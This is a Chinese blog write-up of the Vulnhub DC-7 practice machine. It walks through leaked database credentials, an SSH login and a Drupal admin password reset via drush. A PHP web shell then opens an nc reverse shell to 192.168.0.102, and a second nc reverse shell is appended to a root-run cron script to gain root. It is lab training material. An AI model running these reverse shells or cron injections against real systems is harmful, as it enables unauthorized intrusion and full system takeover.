Vulnhub | DC-7

主机发现

信息搜集

开放80,22端口

 

访问Web页面,熟悉的CMS

有个搜索框,尝试了半天无果,自习看一下页面内容

提示大概意思是说要用一些非常规的思路

最后发现是在下面有一个用户名

搜一下这个用户名,找到了他的Github

 

然后找到了源代码,直接下载下来。

这个属于是源码泄露了

信息利用

在config.php下找到以下

 

<?php
    $servername = "localhost";
    $username = "dc7user";
    $password = "MdR3xOgB7#dW";
    $dbname = "Staff";
    $conn = mysqli_connect($servername, $username, $password, $dbname);
?>

登录后台失败了,那结合之前信息搜集的只开了22和80端口,尝试一下SSH登录

登录成功了,尝试提权发现不太行

ls-la下有一个“mbox”

cat mbox查看一下,发现一个计划任务

查看计划任务

然后查一下其中这个drush命令是什么含义

drush是一个命令行工具,旨在帮助您从终端上使用 Drupal

那么我们就可以利用这条命令来修改web后台的管理员账户密码

drush user-password admin --password="new_pass" 
#想要更改您的密码?就这么简单。
#记得执行命令前先切换到Drupal的目录下面。
cd /var/www/html/
#Drupal默认账户是admin  123456为我修改的密码。
drush user-password admin --password="123456"

接着回到Web站点,登录成功

Web渗透

因为之前打过其他系列的,后台有一个以PHP保存的模式,但是找了半天没找到

查了一下是需要自己动手安装一个PHP环境

 

选择从URL安装,输入以下:

https://ftp.drupal.org/files/projects/php-8.x-1.x-dev.tar.gz

在搜索框搜PHP,勾上点安装

来到编辑页面就会发现

写一个phpinfo试一试

<?php phpinfo();?>

 

 

OK

反弹shell

<?php system('nc -e /bin/bash 192.168.0.102 9002')?>

提权

交互shell

python -c "import pty;pty.spawn('/bin/bash')"

去计划任务里面写一个反弹shell命令(因为计划任务是以root权限运行的,所以直接反弹回来就是root权限)

/opt/scripts/backups.sh

echo "nc 192.168.0.102 9003 -e /bin/bash" >> /opt/scripts/backups.sh

我这里写错了一条,不过没关系

接着就一直等吧,需要等挺久的

 

 

 

 

posted @ 2022-08-27 16:58  mlxwl  阅读(71)  评论(0编辑  收藏  举报